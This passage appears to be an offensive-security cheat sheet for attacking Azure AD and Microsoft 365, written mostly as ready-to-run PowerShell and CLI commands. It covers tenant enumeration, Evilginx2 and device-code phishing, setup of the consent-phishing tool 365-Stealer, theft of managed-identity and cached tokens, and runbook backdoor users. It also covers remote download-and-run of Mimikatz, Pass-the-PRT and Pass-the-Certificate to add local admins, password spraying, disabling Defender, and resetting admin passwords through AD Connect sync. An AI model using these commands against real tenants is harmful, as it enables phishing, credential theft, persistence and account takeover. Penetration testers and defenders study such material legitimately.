C:\Tools\MicroBurst\Misc\InvokeEnumerateAzureSubDomains.ps1 +PS> Invoke-EnumerateAzureSubDomains -Base -Verbose +Subdomain Service +--------- ------- +.mail.protection.outlook.com Email +.onmicrosoft.com Microsoft Hosted Domain +``` + +### Enumerate tenant with Azure AD Powershell + +```powershell +Import-Module C:\Tools\AzureAD\AzureAD.psd1 +Import-Module C:\Tools\AzureADPreview\AzureADPreview.psd1 +PS> $passwd = ConvertTo-SecureString "" -AsPlainText -Force +PS> $creds = New-Object System.Management.Automation.PSCredential("test@.onmicrosoft.com", $passwd) +PS Az> Connect-AzureAD -Credential $creds + +PS AzureAD> Get-AzureADUser -All $true +PS AzureAD> Get-AzureADUser -All $true | select UserPrincipalName +PS AzureAD> Get-AzureADGroup -All $true +PS AzureAD> Get-AzureADDevice +PS AzureAD> Get-AzureADDirectoryRole -Filter "DisplayName eq 'Global Administrator'" | Get-AzureADDirectoryRoleMember +PS AzureADPreview> Get-AzureADMSRoleDefinition | ?{$_.IsBuiltin -eq $False} | select DisplayName +``` + +### Enumerate tenant with Az Powershell + +```powershell +PS> $passwd = ConvertTo-SecureString "" -AsPlainText -Force +PS> $creds = New-Object System.Management.Automation.PSCredential ("test@.onmicrosoft.com", $passwd) +PS Az> Connect-AzAccount -Credential $creds + +PS Az> Get-AzResource +PS Az> Get-AzRoleAssignment -SignInName test@.onmicrosoft.com +PS Az> Get-AzVM | fl +PS Az> Get-AzWebApp | ?{$_.Kind -notmatch "functionapp"} +PS Az> Get-AzFunctionApp +PS Az> Get-AzStorageAccount | fl +PS Az> Get-AzKeyVault +``` + +### Enumerate tenant with az cli + +```powershell +PS> az login -u test@.onmicrosoft.com -p +PS> az vm list +PS> az vm list --query "[].[name]" -o table +PS> az webapp list +PS> az functionapp list --query "[].[name]" -o table +PS> az storage account list +PS> az keyvault list +``` + +### Enumerate manually + +* Federation with Azure AD or O365 + ```powershell + https://login.microsoftonline.com/getuserrealm.srf?login=@&xml=1 + 
https://login.microsoftonline.com/getuserrealm.srf?login=root@.onmicrosoft.com&xml=1 + ``` +* Get the Tenant ID + ```powershell + https://login.microsoftonline.com//.well-known/openid-configuration + https://login.microsoftonline.com/.onmicrosoft.com/.well-known/openid-configuration + ``` + +## Enumeration methodology + +```powershell +# Check Azure Joined +PS> dsregcmd.exe /status ++----------------------------------------------------------------------+ +| Device State | ++----------------------------------------------------------------------+ + AzureAdJoined : YES + EnterpriseJoined : NO + DomainJoined : NO + Device Name : jumpvm + +# Enumerate resources +PS Az> Get-AzResource + +# Enumerate role assignments +PS Az> Get-AzRoleAssignment -Scope /subscriptions//resourceGroups/RESEARCH/providers/Microsoft.Compute/virtualMachines/` + +# Get info on a role +PS Az> Get-AzRoleDefinition -Name "Virtual Machine Command Executor" + +# Get info user +PS AzureAD> Get-AzureADUser -ObjectId +PS AzureAD> Get-AzureADUser -ObjectId test@.onmicrosoft.com | fl * + +# List all groups +PS AzureAD> Get-AzureADGroup -All $true + +# Get members of a group +PS Az> Get-AzADGroup -DisplayName '' +PS Az> Get-AzADGroupMember -GroupDisplayName '' | select UserPrincipalName + +# Get Azure AD information +PS> Import-Module C:\Tools\AADInternals\AADInternals.psd1 +PS AADInternals> Get-AADIntLoginInformation -UserName admin@.onmicrosoft.com +PS AADInternals> Get-AADIntTenantID -Domain .onmicrosoft.com # Get Tenant ID +PS AADInternals> Invoke-AADIntReconAsOutsider -DomainName # Get all the information + +# Check if there is a user logged-in to az cli +PS> az ad signed-in-user show + +# Check AppID Alternative Names/Display Name +PS AzureAD> Get-AzureADServicePrincipal -All $True | ?{$_.AppId -eq ""} | fl + + +# Get all application objects registered using the current tenant +PS AzureAD> Get-AzureADApplication -All $true + +# Get all details about an application +PS AzureAD> Get-AzureADApplication 
-ObjectId | fl * + +# List all VM's the user has access to +PS Az> Get-AzVM +PS Az> Get-AzVM | fl + +# Get all function apps +PS Az> Get-AzFunctionApp + +# Get all webapps +PS Az> Get-AzWebApp +PS Az> Get-AzWebApp | select-object Name, Type, Hostnames + +# List all storage accounts +PS Az> Get-AzStorageAccount +PS Az> Get-AzStorageAccount | fl + +# List all keyvaults +PS Az> Get-AzKeyVault +``` + +## Phishing with Evilginx2 + +```powershell +PS C:\Tools> evilginx2 -p C:\Tools\evilginx2\phishlets +: config domain username.corp +: config ip 10.10.10.10 +: phishlets hostname o365 login.username.corp +: phishlets get-hosts o365 + +Create a DNS entry for login.login.username.corp and www.login.username.corp, type A, pointing to your machine + +# copy certificate and enable the phishing +PS C:\Tools> Copy-Item C:\Users\Username\.evilginx\crt\ca.crt C:\Users\Username\.evilginx\crt\login.username.corp\o365.crt +PS C:\Tools> Copy-Item C:\Users\Username\.evilginx\crt\private.key C:\Users\Username\.evilginx\crt\login.username.corp\o365.key +: phishlets enable o365 + +# get the phishing URL +: lures create o365 +: lures get-url 0 +``` + +## Illicit Consent Grant + +> The attacker creates an Azure-registered application that requests access to data such as contact information, email, or documents. The attacker then tricks an end user into granting consent to the application so that the attacker can gain access to the data that the target user has access to. + +Check if users are allowed to consent to apps: `PS AzureADPreview> (GetAzureADMSAuthorizationPolicy).PermissionGrantPolicyIdsAssignedToDefaultUserRole` +* **Disable user consent** : Users cannot grant permissions to applications. 
+* **Users can consent to apps from verified publishers or your organization, but only for permissions you select** : All users can only consent to apps that were published by a verified publisher and apps that are registered in your tenant +* **Users can consent to all apps** : allows all users to consent to any permission which doesn't require admin consent, +* **Custom app consent policy** + +### Register Application + +1. Login to https://portal.azure.com > Azure Active Directory +2. Click on **App registrations** > **New registration** +3. Enter the Name for our application +4. Under support account types select **"Accounts in any organizational directory (Any Azure AD directory - Multitenant)"** +5. Enter the Redirect URL. This URL should be pointed towards our 365-Stealer application that we will host for hosting our phishing page. Make sure the endpoint is `https://:/login/authorized`. +6. Click **Register** and save the **Application ID** + +### Configure Application + +1. Click on `Certificates & secrets` +2. Click on `New client secret` then enter the **Description** and click on **Add**. +3. Save the **secret**'s value. +4. Click on API permissions > Add a permission +5. Click on Microsoft Graph > **Delegated permissions** +6. 
Search and select the below mentioned permissions and click on Add permission + * Contacts.Read + * Mail.Read / Mail.ReadWrite + * Mail.Send + * Notes.Read.All + * Mailboxsettings.ReadWrite + * Files.ReadWrite.All + * User.ReadBasic.All + * User.Read + +### Setup 365-Stealer (Deprecated) + +:warning: Default port for 365-Stealer phishing is 443 + +- Run XAMPP and start Apache +- Clone 365-Stealer into `C:\xampp\htdocs\` + * `git clone https://github.com/AlteredSecurity/365-Stealer.git` +- Install the requirements + * Python3 + * PHP CLI or Xampp server + * `pip install -r requirements.txt` +- Enable sqlite3 (Xampp > Apache config > php.ini) and restart Apache +- Edit `C:/xampp/htdocs/yourvictims/index.php` if needed + - Disable IP whitelisting `$enableIpWhiteList = false;` +- Go to 365-Stealer Management portal > Configuration (http://localhost:82/365-stealer/yourVictims) + - **Client Id** (Mandatory): This will be the Application(Client) Id of the application that we registered. + - **Client Secret** (Mandatory): Secret value from the Certificates & secrets tab that we created. + - **Redirect URL** (Mandatory): Specify the redirect URL that we entered during registering the App like `https:///login/authorized` + - **Macros Location**: Path of macro file that we want to inject. + - **Extension in OneDrive**: We can provide file extensions that we want to download from the victims account or provide `*` to download all the files present in the victims OneDrive. The file extensions should be comma separated like txt, pdf, docx etc. 
+ - **Delay**: Delay the request by specifying time in seconds while stealing +- Create a Self Signed Certificate to use HTTPS +- Run the application either click on the button or run this command : `python 365-Stealer.py --run-app` + - `--no-ssl`: disable HTTPS + - `--port`: change the default listening port + - `--token`: provide a specific token + - `--refresh-token XXX --client-id YYY --client-secret ZZZ`: use a refresh token +- Find the Phishing URL: go to `https://:` and click on **Read More** button or in the console. + +### Setup Vajra + +> Vajra is a UI-based tool with multiple techniques for attacking and enumerating in the target's Azure environment. It features an intuitive web-based user interface built with the Python Flask module for a better user experience. The primary focus of this tool is to have different attacking techniques all at one place with web UI interfaces. - https://github.com/TROUBLE-1/Vajra + +**Mitigation**: Enable `Do not allow user consent` for applications in the "Consent and permissions menu". + + +## Device Code Phish + +Requirements: +* Azure AD / Office 365 E3 Subscription + +Exploitation: + +* Import TokenTactics: `PS C:\TokenTactics> Import-Module .\TokenTactics.psd1` +* Request a device code for the Azure Graph API using TokenTactics: `Get-AzureToken -Client Graph` +* Replace `` in the [phishing email](https://github.com/rvrsh3ll/TokenTactics/blob/main/resources/DeviceCodePhishingEmailTemplate.oft) +* Leave TokenTactics running in the PowerShell window and send the phishing email +* Targeted user will follow the link to https://microsoft.com/devicelogin and complete the Device Code form +* Enjoy your **Access Token** & **Refresh Token** + + +## Token from Managed Identity + +> **MSI_ENDPOINT** is an alias for **IDENTITY_ENDPOINT**, and **MSI_SECRET** is an alias for **IDENTITY_HEADER**. 
+ +Find IDENTITY_HEADER and IDENTITY_ENDPOINT from the environment : `env` + +Most of the time, you want a token for one of these resources: +* https://storage.azure.com +* https://vault.azure.net +* https://graph.microsoft.com +* https://management.azure.com + + +### Azure API via Powershell + +Get **access_token** from **IDENTITY_HEADER** and **IDENTITY_ENDPOINT**: `system('curl "$IDENTITY_ENDPOINT?resource=https://management.azure.com/&api-version=2017-09-01" -H secret:$IDENTITY_HEADER');`. + +Then query the Azure REST API to get the **subscription ID** and more . + +```powershell +$Token = 'eyJ0eX..' +$URI = 'https://management.azure.com/subscriptions?api-version=2020-01-01' +# $URI = 'https://graph.microsoft.com/v1.0/applications' +$RequestParams = @{ + Method = 'GET' + Uri = $URI + Headers = @{ + 'Authorization' = "Bearer $Token" + } +} +(Invoke-RestMethod @RequestParams).value + +# List resources and check for runCommand privileges +$URI = 'https://management.azure.com/subscriptions/b413826f-108d-4049-8c11-d52d5d388768/resources?api-version=2020-10-01' +$URI = 'https://management.azure.com/subscriptions/b413826f-108d-4049-8c11-d52d5d388768/resourceGroups//providers/Microsoft.Compute/virtualMachines/ func.HttpResponse: + logging.info('Python HTTP trigger function processed a request.') + IDENTITY_ENDPOINT = os.environ['IDENTITY_ENDPOINT'] + IDENTITY_HEADER = os.environ['IDENTITY_HEADER'] + cmd = 'curl "%s?resource=https://management.azure.com&apiversion=2017-09-01" -H secret:%s' % (IDENTITY_ENDPOINT, IDENTITY_HEADER) + val = os.popen(cmd).read() + return func.HttpResponse(val, status_code=200) +``` + + +### Get Tokens + +:warning: The lifetime of a Primary Refresh Token is 14 days! 
+ +```powershell +# az cli - get tokens +az account get-access-token +az account get-access-token --resource-type aad-graph +# or Az +(Get-AzAccessToken -ResourceUrl https://graph.microsoft.com).Token +# or from a managed identity using IDENTITY_HEADER and IDENTITY_ENDPOINT +``` + +### Use Tokens + +> Tokens contain all the claims including that for MFA and Conditional Access + +* Az Powershell + ```powershell + PS C:\Tools> $token = 'eyJ0e..' + PS C:\Tools> Connect-AzAccount -AccessToken $token -AccountId + + # Access Token and Graph Token + PS C:\Tools> $token = 'eyJ0eX..' + PS C:\Tools> $graphaccesstoken = 'eyJ0eX..' + PS C:\Tools> Connect-AzAccount -AccessToken $token -GraphAccessToken $graphaccesstoken -AccountId + PS C:\Tools> Get-AzResource + # ERROR: 'this.Client.SubscriptionId' cannot be null. + # ---> The managed identity has no rights on any of the Azure resources. Switch to to GraphAPI + ``` +* AzureAD + ```powershell + Import-Module C:\Tools\AzureAD\AzureAD.psd1 + $AADToken = 'eyJ0…' + Connect-AzureAD -AadAccessToken $AADToken -TenantId -AccountId + ``` + +### Refresh Tokens + +* https://github.com/ConstantinT/Lantern + ```powershell + Lantern.exe cookie --derivedkey --context --prt + Lantern.exe mdm --joindevice --accesstoken (or some combination from the token part) --devicename --outpfxfile + Lantern.exe token --username --password + Lantern.exe token --refreshtoken + Lantern.exe devicekeys --pfxpath XXXX.pfx --refreshtoken (--prtcookie / ---username + --password ) + ``` +* https://github.com/rvrsh3ll/TokenTactics + ```powershell + Import-Module .\TokenTactics.psd1 + CommandType Name Version Source + ----------- ---- ------- ------ + Function Clear-Token 0.0.1 TokenTactics + Function Dump-OWAMailboxViaMSGraphApi 0.0.1 TokenTactics + Function Forge-UserAgent 0.0.1 TokenTactics + Function Get-AzureToken 0.0.1 TokenTactics + Function Get-TenantID 0.0.1 TokenTactics + Function Open-OWAMailboxInBrowser 0.0.1 TokenTactics + Function Parse-JWTtoken 0.0.1 
TokenTactics + Function RefreshTo-AzureCoreManagementToken 0.0.1 TokenTactics + Function RefreshTo-AzureManagementToken 0.0.1 TokenTactics + Function RefreshTo-DODMSGraphToken 0.0.1 TokenTactics + Function RefreshTo-GraphToken 0.0.1 TokenTactics + Function RefreshTo-MAMToken 0.0.1 TokenTactics + Function RefreshTo-MSGraphToken 0.0.1 TokenTactics + Function RefreshTo-MSManageToken 0.0.1 TokenTactics + Function RefreshTo-MSTeamsToken 0.0.1 TokenTactics + Function RefreshTo-O365SuiteUXToken 0.0.1 TokenTactics + Function RefreshTo-OfficeAppsToken 0.0.1 TokenTactics + Function RefreshTo-OfficeManagementToken 0.0.1 TokenTactics + Function RefreshTo-OutlookToken 0.0.1 TokenTactics + Function RefreshTo-SubstrateToken 0.0.1 TokenTactics + ``` + +## Stealing Tokens + +* Get-AzurePasswords + ```powershell + Import-Module Microburst.psm1 + Get-AzurePasswords + Get-AzurePasswords -Verbose | Out-GridView + ``` + +### Stealing tokens from az cli + +* az cli stores access tokens in clear text in **accessTokens.json** in the directory `C:\Users\\.Azure` +* azureProfile.json in the same directory contains information about subscriptions. + +### Stealing tokens from az powershell + +* Az PowerShell stores access tokens in clear text in **TokenCache.dat** in the directory `C:\Users\\.Azure` +* It also stores **ServicePrincipalSecret** in clear-text in **AzureRmContext.json** +* Users can save tokens using `Save-AzContext` + + +## Add credentials to all Enterprise Applications + +```powershell +# Add secrets +PS > . 
C:\Tools\Add-AzADAppSecret.ps1 +PS > Add-AzADAppSecret -GraphToken $graphtoken -Verbose + +# Use secrets to authenticate as Service Principal +PS > $password = ConvertTo-SecureString '' -AsPlainText -Force +PS > $creds = New-Object System.Management.Automation.PSCredential('', $password) +PS > Connect-AzAccount -ServicePrincipal -Credential $creds -Tenant '' +``` + +## Spawn SSH for Azure Web App + +```powershell +az webapp create-remote-connection --subscription --resource-group -n +``` + +## Azure Storage Blob + +* Blobs - `*.blob.core.windows.net` +* File Services - `*.file.core.windows.net` +* Data Tables - `*.table.core.windows.net` +* Queues - `*.queue.core.windows.net` + +### Enumerate blobs + +```powershell +PS > . C:\Tools\MicroBurst\Misc\InvokeEnumerateAzureBlobs.ps1 +PS > Invoke-EnumerateAzureBlobs -Base -OutputFile azureblobs.txt +Found Storage Account - testsecure.blob.core.windows.net +Found Storage Account - securetest.blob.core.windows.net +Found Storage Account - securedata.blob.core.windows.net +Found Storage Account - securefiles.blob.core.windows.net +``` + +### SAS URL + +* Use [Storage Explorer](https://azure.microsoft.com/en-us/features/storage-explorer/) +* Click on **Open Connect Dialog** in the left menu. +* Select **Blob container**. +* On the **Select Authentication Method** page + * Select **Shared access signature (SAS)** and click on Next + * Copy the URL in **Blob container SAS URL** field. + +:warning: You can also use `subscription`(username/password) to access storage resources such as blobs and files. 
+ +### List and download blobs + +```powershell +PS Az> Get-AzResource +PS Az> Get-AzStorageAccount -name -ResourceGroupName +PS Az> Get-AzStorageContainer -Context (Get-AzStorageAccount -name -ResourceGroupName ).context +PS Az> Get-AzStorageBlobContent -Container -Context (Get-AzStorageAccount -name -ResourceGroupName ).context -Blob +``` + +## Runbook Automation + +### Create a Runbook + +```powershell +# Check user right for automation +az extension add --upgrade -n automation +az automation account list # if it doesn't return anything the user is not a part of an Automation group +az ad signed-in-user list-owned-objects + +# If the user is not part of an "Automation" group. +# Add him to a custom group , e.g: "Automation Admins" +Add-AzureADGroupMember -ObjectId -RefObjectId -Verbose + +# Get the role of a user on the Automation account +# Contributor or higher = Can create and execute Runbooks +Get-AzRoleAssignment -Scope /subscriptions//resourceGroups//providers/Microsoft.Automation/automationAccounts/ + +# List hybrid workers +Get-AzAutomationHybridWorkerGroup -AutomationAccountName -ResourceGroupName + +# Create a Powershell Runbook +PS C:\Tools> Import-AzAutomationRunbook -Name -Path C:\Tools\username.ps1 -AutomationAccountName -ResourceGroupName -Type PowerShell -Force -Verbose + +# Publish the Runbook +Publish-AzAutomationRunbook -RunbookName -AutomationAccountName -ResourceGroupName -Verbose + +# Start the Runbook +Start-AzAutomationRunbook -RunbookName -RunOn Workergroup1 -AutomationAccountName -ResourceGroupName -Verbose +``` + +### Persistence via Automation accounts + +* Create a new Automation Account + * "Create Azure Run As account": Yes +* Import a new runbook that creates an AzureAD user with Owner permissions for the subscription* + * Sample runbook for this Blog located here – https://github.com/NetSPI/MicroBurst + * Publish the runbook + * Add a webhook to the runbook +* Add the AzureAD module to the Automation account + * Update the Azure 
Automation Modules +* Assign "User Administrator" and "Subscription Owner" rights to the automation account +* Eventually lose your access… +* Trigger the webhook with a post request to create the new user + ```powershell + $uri = "https://s15events.azure-automation.net/webhooks?token=h6[REDACTED]%3d" + $AccountInfo = @(@{RequestBody=@{Username="BackdoorUsername";Password="BackdoorPassword"}}) + $body = ConvertTo-Json -InputObject $AccountInfo + $response = Invoke-WebRequest -Method Post -Uri $uri -Body $body + ``` + + +## Virtual Machine RunCommand + +Requirements: +* `Microsoft.Compute/virtualMachines/runCommand/action` + +```powershell +# Get Public IP of VM : query the network interface +PS AzureAD> Get-AzVM -Name -ResourceGroupName | select -ExpandProperty NetworkProfile +PS AzureAD> Get-AzNetworkInterface -Name +PS AzureAD> Get-AzPublicIpAddress -Name + +# Execute Powershell script on the VM +PS AzureAD> Invoke-AzVMRunCommand -VMName -ResourceGroupName -CommandId 'RunPowerShellScript' -ScriptPath 'C:\Tools\adduser.ps1' -Verbose + +# Connect via WinRM +PS C:\Tools> $password = ConvertTo-SecureString '' -AsPlainText -Force +PS C:\Tools> $creds = New-Object System.Management.Automation.PSCredential('username', $Password) +PS C:\Tools> $sess = New-PSSession -ComputerName -Credential $creds -SessionOption (New-PSSessionOption -ProxyAccessType NoProxyServer) +PS C:\Tools> Enter-PSSession $sess +``` + +> Allow anyone with "Contributor" rights to run PowerShell scripts on any Azure VM in a subscription as NT Authority\System + +```powershell +# List available VMs +PS C:\> Get-AzureRmVM -status | where {$_.PowerState -EQ "VM running"} | select ResourceGroupName,Name +ResourceGroupName Name +----------------- ---- +TESTRESOURCES Remote-Test + +# Execute Powershell script on the VM +PS C:\> Invoke-AzureRmVMRunCommand -ResourceGroupName TESTRESOURCES -VMName Remote-Test -CommandId RunPowerShellScript -ScriptPath Mimikatz.ps1 +``` + +Against the whole subscription using 
MicroBurst.ps1 + +```powershell +Import-module MicroBurst.psm1 +Invoke-AzureRmVMBulkCMD -Script Mimikatz.ps1 -Verbose -output Output.txt +``` + + +## KeyVault Secrets + +```powershell +# keyvault access token +curl "$IDENTITY_ENDPOINT?resource=https://vault.azure.net&apiversion=2017-09-01" -H secret:$IDENTITY_HEADER +curl "$IDENTITY_ENDPOINT?resource=https://management.azure.com&apiversion=2017-09-01" -H secret:$IDENTITY_HEADER + +# connect +PS> $token = 'eyJ0..' +PS> $keyvaulttoken = 'eyJ0..' +PS Az> Connect-AzAccount -AccessToken $token -AccountId 2e91a4fea0f2-46ee-8214-fa2ff6aa9abc -KeyVaultAccessToken $keyvaulttoken + +# query the vault and the secrets +PS Az> Get-AzKeyVault +PS Az> Get-AzKeyVaultSecret -VaultName ResearchKeyVault +PS Az> Get-AzKeyVaultSecret -VaultName ResearchKeyVault -Name Reader -AsPlainText +``` + +## Pass The PRT + +> MimiKatz (version 2.2.0 and above) can be used to attack (hybrid) Azure AD joined machines for lateral movement attacks via the Primary Refresh Token (PRT) which is used for Azure AD SSO (single sign-on). + +```powershell +# Run mimikatz to obtain the PRT +PS> iex (New-Object Net.Webclient).downloadstring("https://raw.githubusercontent.com/samratashok/nishang/master/Gather/Invoke-Mimikatz.ps1") +PS> Invoke-Mimikatz -Command '"privilege::debug" "sekurlsa::cloudap"' + +# Copy the PRT and KeyValue +Mimikatz> privilege::debug +Mimikatz> token::elevate +Mimikatz> dpapi::cloudapkd /keyvalue: /unprotect + +# Copy the Context, ClearKey and DerivedKey +Mimikatz> dpapi::cloudapkd /context: /derivedkey: /Prt: +``` + +```powershell +# Generate a JWT +PS> Import-Module C:\Tools\AADInternals\AADInternals.psd1 +PS AADInternals> $PRT_OF_USER = '...' +PS AADInternals> while($PRT_OF_USER.Length % 4) {$PRT_OF_USER += "="} +PS AADInternals> $PRT = [text.encoding]::UTF8.GetString([convert]::FromBase64String($PRT_OF_USER)) +PS AADInternals> $ClearKey = "XXYYZZ..." 
+PS AADInternals> $SKey = [convert]::ToBase64String( [byte[]] ($ClearKey -replace '..', '0x$&,' -split ',' -ne '')) +PS AADInternals> New-AADIntUserPRTToken -RefreshToken $PRT -SessionKey $SKey –GetNonce +eyJ0eXAiOiJKV1QiL... +``` + +The `` (JSON Web Token) can be used as PRT cookie in a (anonymous) browser session for https://login.microsoftonline.com/login.srf. +Edit the Chrome cookie (F12) -> Application -> Cookies with the values: + +```powershell +Name: x-ms-RefreshTokenCredential +Value: +HttpOnly: √ +``` + +:warning: Mark the cookie with the flags `HTTPOnly` and `Secure`. + + +## Pass The Certificate + +```ps1 +Copy-Item -ToSession $jumpvm -Path C:\Tools\PrtToCertmaster.zip -Destination C:\Users\Username\Documents\username –Verbose +Expand-Archive -Path C:\Users\Username\Documents\username\PrtToCert-master.zip -DestinationPath C:\Users\Username\Documents\username\PrtToCert + +# Require the PRT, TenantID, Context and DerivedKey +& 'C:\Program Files\Python39\python.exe' C:\Users\Username\Documents\username\PrtToCert\RequestCert.py --tenantId --prt --userName @.onmicrosoft.com --hexCtx --hexDerivedKey +# PFX saved with the name @.onmicrosoft.com.pfx and password AzureADCert +``` + +Python tool that will authenticate to the remote machine, run PSEXEC and open a CMD on the victim machine + +https://github.com/morRubin/AzureADJoinedMachinePTC + +```ps1 +Main.py [-h] --usercert USERCERT --certpass CERTPASS --remoteip REMOTEIP +Main.py --usercert "admin.pfx" --certpass password --remoteip 10.10.10.10 + +python Main.py --usercert C:\Users\Username\Documents\username\@.onmicrosoft.com.pfx -- +certpass AzureADCert --remoteip 10.10.10.10 --command "cmd.exe /c net user username Password@123 /add /Y && net localgroup administrators username /add" +``` + +## Intunes Administration + +Requirements: +* **Global Administrator** or **Intune Administrator** Privilege : `Get-AzureADGroup -Filter "DisplayName eq 'Intune Administrators'"` + +1. 
Login into https://endpoint.microsoft.com/#home or use Pass-The-PRT +2. Go to **Devices** -> **All Devices** to check devices enrolled to Intune +3. Go to **Scripts** and click on **Add** for Windows 10. +4. Add a **Powershell script** +5. Specify **Add all users** and **Add all devices** in the **Assignments** page. + +:warning: It will take up to one hour before you script is executed ! + + + +## Dynamic Group Membership + +Get groups that allow Dynamic membership: `Get-AzureADMSGroup | ?{$_.GroupTypes -eq 'DynamicMembership'}` + +Rule example : `(user.otherMails -any (_ -contains "vendor")) -and (user.userType -eq "guest")` +Rule description: Any Guest user whose secondary email contains the string 'vendor' will be added to the group + +1. Open user's profile, click on **Manage** +2. Click on **Resend** invite and to get an invitation URL +3. Set the secondary email + ```powershell + PS> Set-AzureADUser -ObjectId -OtherMails @.onmicrosoft.com -Verbose + ``` + +## Administrative Unit + +> Administrative Unit can reset password of another user + +```powershell +PS AzureAD> Get-AzureADMSAdministrativeUnit -Id +PS AzureAD> Get-AzureADMSAdministrativeUnitMember -Id +PS AzureAD> Get-AzureADMSScopedRoleMembership -Id | fl +PS AzureAD> Get-AzureADDirectoryRole -ObjectId +PS AzureAD> Get-AzureADUser -ObjectId | fl +PS C:\Tools> $password = "Password" | ConvertToSecureString -AsPlainText -Force +PS C:\Tools> (Get-AzureADUser -All $true | ?{$_.UserPrincipalName -eq "@.onmicrosoft.com"}).ObjectId | SetAzureADUserPassword -Password $Password -Verbose +``` + +## Deployment Template + +```powershell +PS Az> Get-AzResourceGroup +PS Az> Get-AzResourceGroupDeployment -ResourceGroupName SAP + +# Export +PS Az> Save-AzResourceGroupDeploymentTemplate -ResourceGroupName -DeploymentName +cat .json # search for hardcoded password +cat | Select-String password +``` + +## Application Proxy + +```powershell +# Enumerate application that have Proxy +PS C:\Tools> Get-AzureADApplication -All 
$true | %{try{GetAzureADApplicationProxyApplication -ObjectId $_.ObjectID;$_.DisplayName;$_.ObjectID}catch{}} +PS C:\Tools> Get-AzureADServicePrincipal -All $true | ?{$_.DisplayName -eq "Finance Management System"} +PS C:\Tools> . C:\Tools\GetApplicationProxyAssignedUsersAndGroups.ps1 +PS C:\Tools> Get-ApplicationProxyAssignedUsersAndGroups -ObjectId +``` + +## Application Endpoint +```powershell +# Enumerate possible endpoints for applications starting/ending with PREFIX +PS C:\Tools> Get-AzureADServicePrincipal -All $true -Filter "startswith(displayName,'PREFIX')" | % {$_.ReplyUrls} +PS C:\Tools> Get-AzureADApplication -All $true -Filter "endswith(displayName,'PREFIX')" | Select-Object ReplyUrls,WwwHomePage,HomePage +``` + +## Conditional Access + +* Bypassing conditional access by copying User-Agent (Chrome Dev Tool > Select iPad Pro, etc) +* Bypassing conditional access by faking device compliance + ```powershell + # AAD Internals - Making your device compliant + # Get an access token for AAD join and save to cache + Get-AADIntAccessTokenForAADJoin -SaveToCache + # Join the device to Azure AD + Join-AADIntDeviceToAzureAD -DeviceName "SixByFour" -DeviceType "Commodore" -OSVersion "C64" + # Marking device compliant - option 1: Registering device to Intune + # Get an access token for Intune MDM and save to cache (prompts for credentials) + Get-AADIntAccessTokenForIntuneMDM -PfxFileName .\d03994c9-24f8-41ba-a156-1805998d6dc7.pfx -SaveToCache + # Join the device to Intune + Join-AADIntDeviceToIntune -DeviceName "SixByFour" + # Start the call back + Start-AADIntDeviceIntuneCallback -PfxFileName .\d03994c9-24f8-41ba-a156-1805998d6dc7-MDM.pfx -DeviceName "SixByFour" + ``` + + +## Azure AD + +With Microsoft, if you are using any cloud services (Office 365, Exchange Online, etc) with Active Directory (on-prem or in Azure) then an attacker is one credential away from being able to leak your entire Active Directory structure thanks to Azure AD. + +1. 
Authenticate to your webmail portal (i.e. https://webmail.domain.com/) +2. Change your browser URL to: https://azure.microsoft.com/ +3. Pick the account from the active sessions +4. Select Azure Active Directory and enjoy! + +### Azure AD vs Active Directory + +| Active Directory | Azure AD | +|---|---| +| LDAP | REST API'S | +| NTLM/Kerberos | OAuth/SAML/OpenID | +| Structured directory (OU tree) | Flat structure | +| GPO | No GPO's | +| Super fine-tuned access controls | Predefined roles | +| Domain/forest | Tenant | +| Trusts | Guests | + +* Password Hash Syncronization (PHS) + * Passwords from on-premise AD are sent to the cloud + * Use replication via a service account created by AD Connect +* Pass Through Authentication (PTA) + * Possible to perform DLL injection into the PTA agent and intercept authentication requests: credentials in clear-text +* Connect Windows Server AD to Azure AD using Federation Server (ADFS) + * Dir-Sync : Handled by on-premise Windows Server AD, sync username/password + + +* Azure AD Joined : https://pbs.twimg.com/media/EQZv62NWAAEQ8wE?format=jpg&name=large +* Workplace Joined : https://pbs.twimg.com/media/EQZv7UHXsAArdhn?format=jpg&name=large +* Hybrid Joined : https://pbs.twimg.com/media/EQZv77jXkAAC4LK?format=jpg&name=large +* Workplace joined on AADJ or Hybrid : https://pbs.twimg.com/media/EQZv8qBX0AAMWuR?format=jpg&name=large + +### Password Spray + +> Default lockout policy of 10 failed attempts, locking out an account for 60 seconds + +```powershell +git clone https://github.com/dafthack/MSOLSpray +Import-Module .\MSOLSpray.ps1 +Invoke-MSOLSpray -UserList .\userlist.txt -Password Winter2020 +Invoke-MSOLSpray -UserList .\users.txt -Password d0ntSprayme! + +# UserList - UserList file filled with usernames one-per-line in the format "user@domain.com" +# Password - A single password that will be used to perform the password spray. +# OutFile - A file to output valid results to. 
+# Force - Forces the spray to continue and not stop when multiple account lockouts are detected. +# URL - The URL to spray against. Potentially useful if pointing at an API Gateway URL generated with something like FireProx to randomize the IP address you are authenticating from. +``` + +### Convert GUID to SID + +The user's AAD id is translated to SID by concatenating `"S-1–12–1-"` to the decimal representation of each section of the AAD Id. + +```powershell +GUID: [base16(a1)]-[base16(a2)]-[ base16(a3)]-[base16(a4)] +SID: S-1–12–1-[base10(a1)]-[ base10(a2)]-[ base10(a3)]-[ base10(a4)] +``` + +For example, the representation of `6aa89ecb-1f8f-4d92–810d-b0dce30b6c82` is `S-1–12–1–1789435595–1301421967–3702525313–2188119011` + +## Azure AD Connect + +Check if Azure AD Connect is installed : `Get-ADSyncConnector` + +* For **PHS**, we can extract the credentials +* For **PTA**, we can install the agent +* For **Federation**, we can extract the certificate from ADFS server using DA + +```powershell +PS > Set-MpPreference -DisableRealtimeMonitoring $true +PS > Copy-Item -ToSession $adcnct -Path C:\Tools\AADInternals.0.4.5.zip -Destination C:\Users\Administrator\Documents +PS > Expand-Archive C:\Users\Administrator\Documents\AADInternals.0.4.5.zip -DestinationPath C:\Users\Administrator\Documents\AADInternals +PS > Import-Module C:\Users\Administrator\Documents\AADInternals\AADInternals.psd1 +PS > Get-AADIntSyncCredentials + +# Get Token for SYNC account and reset on-prem admin password +PS > $passwd = ConvertToSecureString 'password' -AsPlainText -Force +PS > $creds = New-Object System.Management.Automation.PSCredential ("@.onmicrosoft.com", $passwd) +PS > GetAADIntAccessTokenForAADGraph -Credentials $creds –SaveToCache +PS > Get-AADIntUser -UserPrincipalName onpremadmin@defcorpsecure.onmicrosoft.com | select ImmutableId +PS > Set-AADIntUserPassword -SourceAnchor "" -Password "Password" -Verbose +``` + +1. 
